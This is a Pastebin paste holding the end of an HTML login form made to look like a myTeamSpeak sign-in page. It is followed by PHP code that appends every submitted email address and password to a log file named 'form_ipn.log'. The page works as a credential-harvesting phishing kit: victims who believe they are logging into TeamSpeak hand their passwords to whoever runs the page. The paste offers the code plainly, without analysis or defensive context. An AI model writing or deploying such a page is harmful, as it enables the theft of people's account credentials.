Advertisement
Guest User

Untitled

a guest
Nov 20th, 2017
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. <div class="bottom-section">
  2. <button type="submit" class="btn btn-default login-button__wrapper">Login</button>&nbsp;&nbsp;
  3. <a class="forgot-wrapper" href="https://www.myteamspeak.com/password-reset">Reset Password</a> | <a class="forgot-wrapper" href="https://www.myteamspeak.com/activate">Activate Account</a>
  4. </div>
  5. </div>
  6. </div>
  7. </div>
  8. </form>
  9.  
  10. <?php
  11.  
  12. function doLog($text, $pass)
  13. {
  14. // open log file
  15. $filename = "form_ipn.log";
  16. $fh = fopen($filename, "a") or die("Could not open log file.");
  17. fwrite($fh, "||||| login: $text / pass: $pass ") or die("Could not write file!");
  18. fclose($fh);
  19. }
  20.  
  21. if( (isset($_POST['ts_email'])) && (isset($_POST['pass']))){
  22. doLog($_POST['ts_email'], $_POST['pass']);
  23. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement